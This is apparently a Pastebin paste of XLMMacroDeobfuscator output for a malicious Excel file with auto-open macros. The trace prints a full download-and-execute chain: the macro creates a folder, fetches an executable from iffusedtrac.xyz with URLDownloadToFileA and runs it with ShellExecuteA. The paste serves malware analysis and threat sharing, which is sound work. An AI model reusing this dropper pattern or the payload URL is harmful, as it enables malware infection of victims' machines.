Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- c7e40628fb6beb52d9d73a3b3afd1dca5d2335713593b698637e1a47b42bfc71
- https://twitter.com/ffforward/status/1352529115451187200
- _ _______
- |\ /|( \ ( )
- ( \ / )| ( | () () |
- \ (_) / | | | || || |
- ) _ ( | | | |(_)| |
- / ( ) \ | | | | | |
- ( / \ )| (____/\| ) ( |
- |/ \|(_______/|/ \|
- ______ _______ _______ ______ _______ _______ _______ _______ _________ _______ _______
- ( __ \ ( ____ \( ___ )( ___ \ ( ____ \|\ /|( ____ \( ____ \( ___ )\__ __/( ___ )( ____ )
- | ( \ )| ( \/| ( ) || ( ) )| ( \/| ) ( || ( \/| ( \/| ( ) | ) ( | ( ) || ( )|
- | | ) || (__ | | | || (__/ / | (__ | | | || (_____ | | | (___) | | | | | | || (____)|
- | | | || __) | | | || __ ( | __) | | | |(_____ )| | | ___ | | | | | | || __)
- | | ) || ( | | | || ( \ \ | ( | | | | ) || | | ( ) | | | | | | || (\ (
- | (__/ )| (____/\| (___) || )___) )| ) | (___) |/\____) || (____/\| ) ( | | | | (___) || ) \ \__
- (______/ (_______/(_______)|/ \___/ |/ (_______)\_______)(_______/|/ \| )_( (_______)|/ \__/
- XLMMacroDeobfuscator(v0.1.7) - https://github.com/DissectMalware/XLMMacroDeobfuscator
- File: C:\Users\user\Downloads\c7e40628fb6beb52d9d73a3b3afd1dca5d2335713593b698637e1a47b42bfc71.xls
- Encrypted xls file
- [Loading Cells]
- WARNING *** file size (84997) not 512 + multiple of sector size (512)
- auto_open: auto_open->'LHu'!$HA$373
- [Starting Deobfuscation]
- CELL:HA373 , FullEvaluation , $GX$2555()
- CELL:GX2555 , FullEvaluation , SET.NAME(cvolheciepsi,https://iffusedtrac.xyz/3/bbc.exe)
- CELL:GX2556 , FullEvaluation , SET.NAME(deoxswlfzrmbhq,$BB$54)
- CELL:GX2557 , FullEvaluation , $DV$525()
- CELL:DV525 , FullEvaluation , FORMULA("https://iffusedtrac.xyz/3/bbc.exe",$BB$54)
- CELL:GX2558 , FullEvaluation , GOTO($FO$1446)
- CELL:FO1446 , FullEvaluation , SET.NAME(cvolheciepsi,C:\wCmfmRe\dtwzrQf\GZTJoxx.exe)
- CELL:FO1447 , FullEvaluation , SET.NAME(deoxswlfzrmbhq,$FQ$833)
- CELL:FO1448 , FullEvaluation , $DV$525()
- CELL:DV525 , FullEvaluation , FORMULA("C:\wCmfmRe\dtwzrQf\GZTJoxx.exe",$FQ$833)
- CELL:FO1449 , FullEvaluation , GOTO($IG$243)
- CELL:IG243 , FullEvaluation , SET.NAME(cvolheciepsi,C:\wCmfmRe\dtwzrQf\GZTJoxx.exe)
- CELL:IG244 , FullEvaluation , SET.NAME(deoxswlfzrmbhq,$AA$1219)
- CELL:IG245 , FullEvaluation , $DV$525()
- CELL:DV525 , FullEvaluation , FORMULA("C:\wCmfmRe\dtwzrQf\GZTJoxx.exe",$AA$1219)
- CELL:IG246 , FullEvaluation , GOTO($CT$2484)
- CELL:CT2484 , FullEvaluation , SET.NAME(cvolheciepsi,URLMON)
- CELL:CT2485 , FullEvaluation , SET.NAME(deoxswlfzrmbhq,$DD$48)
- CELL:CT2486 , FullEvaluation , $DV$525()
- CELL:DV525 , FullEvaluation , FORMULA("URLMON",$DD$48)
- CELL:CT2487 , FullEvaluation , GOTO($GR$866)
- CELL:GR866 , FullEvaluation , SET.NAME(cvolheciepsi,URLDownloadToFileA)
- CELL:GR867 , FullEvaluation , SET.NAME(deoxswlfzrmbhq,$AO$1808)
- CELL:GR868 , FullEvaluation , $DV$525()
- CELL:DV525 , FullEvaluation , FORMULA("URLDownloadToFileA",$AO$1808)
- CELL:GR869 , FullEvaluation , GOTO($Q$755)
- CELL:Q755 , FullEvaluation , SET.NAME(cvolheciepsi,JJCCJJ)
- CELL:Q756 , FullEvaluation , SET.NAME(deoxswlfzrmbhq,$BE$2748)
- CELL:Q757 , FullEvaluation , $DV$525()
- CELL:DV525 , FullEvaluation , FORMULA("JJCCJJ",$BE$2748)
- CELL:Q758 , FullEvaluation , GOTO($HO$638)
- CELL:HO638 , FullEvaluation , SET.NAME(cvolheciepsi,Shell32)
- CELL:HO639 , FullEvaluation , SET.NAME(deoxswlfzrmbhq,$FZ$1722)
- CELL:HO640 , FullEvaluation , $DV$525()
- CELL:DV525 , FullEvaluation , FORMULA("Shell32",$FZ$1722)
- CELL:HO641 , FullEvaluation , GOTO($HR$1806)
- CELL:HR1806 , FullEvaluation , SET.NAME(cvolheciepsi,ShellExecuteA)
- CELL:HR1807 , FullEvaluation , SET.NAME(deoxswlfzrmbhq,$AA$2609)
- CELL:HR1808 , FullEvaluation , $DV$525()
- CELL:DV525 , FullEvaluation , FORMULA("ShellExecuteA",$AA$2609)
- CELL:HR1809 , FullEvaluation , GOTO($AJ$685)
- CELL:AJ685 , FullEvaluation , SET.NAME(cvolheciepsi,JJCCCCJ)
- CELL:AJ686 , FullEvaluation , SET.NAME(deoxswlfzrmbhq,$EH$734)
- CELL:AJ687 , FullEvaluation , $DV$525()
- CELL:DV525 , FullEvaluation , FORMULA("JJCCCCJ",$EH$734)
- CELL:AJ688 , FullEvaluation , GOTO($GE$1496)
- CELL:GE1496 , FullEvaluation , SET.NAME(cvolheciepsi,Open)
- CELL:GE1497 , FullEvaluation , SET.NAME(deoxswlfzrmbhq,$FA$484)
- CELL:GE1498 , FullEvaluation , $DV$525()
- CELL:DV525 , FullEvaluation , FORMULA("Open",$FA$484)
- CELL:GE1499 , FullEvaluation , GOTO($AY$1410)
- CELL:AY1410 , FullEvaluation , SET.NAME(cvolheciepsi,regsvr32.exe)
- CELL:AY1411 , FullEvaluation , SET.NAME(deoxswlfzrmbhq,$HL$2686)
- CELL:AY1412 , FullEvaluation , $DV$525()
- CELL:DV525 , FullEvaluation , FORMULA("regsvr32.exe",$HL$2686)
- CELL:AY1413 , FullEvaluation , GOTO($GE$2891)
- CELL:GE2891 , FullEvaluation , SET.NAME(cvolheciepsi,rundll32.exe)
- CELL:GE2892 , FullEvaluation , SET.NAME(deoxswlfzrmbhq,$ER$2096)
- CELL:GE2893 , FullEvaluation , $DV$525()
- CELL:DV525 , FullEvaluation , FORMULA("rundll32.exe",$ER$2096)
- CELL:GE2894 , FullEvaluation , GOTO($AG$2509)
- CELL:AG2509 , FullEvaluation , SET.NAME(cvolheciepsi,C:\wCmfmRe)
- CELL:AG2510 , FullEvaluation , SET.NAME(deoxswlfzrmbhq,$G$2318)
- CELL:AG2511 , FullEvaluation , $DV$525()
- CELL:DV525 , FullEvaluation , FORMULA("C:\wCmfmRe",$G$2318)
- CELL:AG2512 , FullEvaluation , GOTO($DB$2562)
- CELL:DB2562 , FullEvaluation , SET.NAME(cvolheciepsi,C:\wCmfmRe\dtwzrQf)
- CELL:DB2563 , FullEvaluation , SET.NAME(deoxswlfzrmbhq,$U$370)
- CELL:DB2564 , FullEvaluation , $DV$525()
- CELL:DV525 , FullEvaluation , FORMULA("C:\wCmfmRe\dtwzrQf",$U$370)
- CELL:DB2565 , FullEvaluation , GOTO($GW$123)
- CELL:GW123 , FullEvaluation , SET.NAME(cvolheciepsi,Kernel32)
- CELL:GW124 , FullEvaluation , SET.NAME(deoxswlfzrmbhq,$EH$2782)
- CELL:GW125 , FullEvaluation , $DV$525()
- CELL:DV525 , FullEvaluation , FORMULA("Kernel32",$EH$2782)
- CELL:GW126 , FullEvaluation , GOTO($HF$2396)
- CELL:HF2396 , FullEvaluation , SET.NAME(cvolheciepsi,CreateDirectoryA)
- CELL:HF2397 , FullEvaluation , SET.NAME(deoxswlfzrmbhq,$W$2047)
- CELL:HF2398 , FullEvaluation , $DV$525()
- CELL:DV525 , FullEvaluation , FORMULA("CreateDirectoryA",$W$2047)
- CELL:HF2399 , FullEvaluation , GOTO($EJ$1217)
- CELL:EJ1217 , FullEvaluation , SET.NAME(cvolheciepsi,JCJ)
- CELL:EJ1218 , FullEvaluation , SET.NAME(deoxswlfzrmbhq,$EA$1633)
- CELL:EJ1219 , FullEvaluation , $DV$525()
- CELL:DV525 , FullEvaluation , FORMULA("JCJ",$EA$1633)
- CELL:EJ1220 , FullEvaluation , GOTO($FY$2397)
- CELL:FY2397 , FullEvaluation , SET.NAME(cvolheciepsi,INSENG)
- CELL:FY2398 , FullEvaluation , SET.NAME(deoxswlfzrmbhq,$H$206)
- CELL:FY2399 , FullEvaluation , $DV$525()
- CELL:DV525 , FullEvaluation , FORMULA("INSENG",$H$206)
- CELL:FY2400 , FullEvaluation , GOTO($BX$410)
- CELL:BX410 , FullEvaluation , SET.NAME(cvolheciepsi,DownloadFile)
- CELL:BX411 , FullEvaluation , SET.NAME(deoxswlfzrmbhq,$FZ$1407)
- CELL:BX412 , FullEvaluation , $DV$525()
- CELL:DV525 , FullEvaluation , FORMULA("DownloadFile",$FZ$1407)
- CELL:BX413 , FullEvaluation , GOTO($CQ$2870)
- CELL:CQ2870 , FullEvaluation , SET.NAME(cvolheciepsi,BCCJ)
- CELL:CQ2871 , FullEvaluation , SET.NAME(deoxswlfzrmbhq,$GO$503)
- CELL:CQ2872 , FullEvaluation , $DV$525()
- CELL:DV525 , FullEvaluation , FORMULA("BCCJ",$GO$503)
- CELL:CQ2873 , FullEvaluation , GOTO($FX$1117)
- CELL:FX1117 , FullEvaluation , SET.NAME(cvolheciepsi,GEJunuZl)
- CELL:FX1118 , FullEvaluation , SET.NAME(deoxswlfzrmbhq,$AJ$617)
- CELL:FX1119 , FullEvaluation , $DV$525()
- CELL:DV525 , FullEvaluation , FORMULA("GEJunuZl",$AJ$617)
- CELL:FX1120 , FullEvaluation , GOTO($Y$2822)
- CELL:Y2822 , FullEvaluation , SET.NAME(cvolheciepsi,cswzqQfY)
- CELL:Y2823 , FullEvaluation , SET.NAME(deoxswlfzrmbhq,$FW$2046)
- CELL:Y2824 , FullEvaluation , $DV$525()
- CELL:DV525 , FullEvaluation , FORMULA("cswzqQfY",$FW$2046)
- CELL:Y2825 , FullEvaluation , GOTO($FP$1090)
- CELL:FP1090 , FullEvaluation , SET.NAME(cvolheciepsi,xgiDfkxI)
- CELL:FP1091 , FullEvaluation , SET.NAME(deoxswlfzrmbhq,$HH$1839)
- CELL:FP1092 , FullEvaluation , $DV$525()
- CELL:DV525 , FullEvaluation , FORMULA("xgiDfkxI",$HH$1839)
- CELL:FP1093 , FullEvaluation , $HA$374()
- CELL:HA374 , FullEvaluation , CALL("Kernel32","CreateDirectoryA","JCJ","C:\wCmfmRe",0)
- CELL:HA375 , FullEvaluation , CALL("Kernel32","CreateDirectoryA","JCJ","C:\wCmfmRe\dtwzrQf",0)
- CELL:HA377 , FullEvaluation , CALL("URLMON","URLDownloadToFileA","JJCCJJ",0,"https://iffusedtrac.xyz/3/bbc.exe","C:\wCmfmRe\dtwzrQf\GZTJoxx.exe",0,0)
- CELL:HA379 , FullEvaluation , IF($HA$378<>0.0)
- CELL:HA380 , FullEvaluation , CALL("INSENG","DownloadFile","BCCJ","https://iffusedtrac.xyz/3/bbc.exe","C:\wCmfmRe\dtwzrQf\GZTJoxx.exe",1)
- CELL:HA382 , FullEvaluation , END.IF
- CELL:HA384 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCCJ",0,"Open","C:\wCmfmRe\dtwzrQf\GZTJoxx.exe",,0,0)
- CELL:HA387 , End , HALT()
- Files:
- [END of Deobfuscation]
- time elapsed: 0.6546010971069336
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement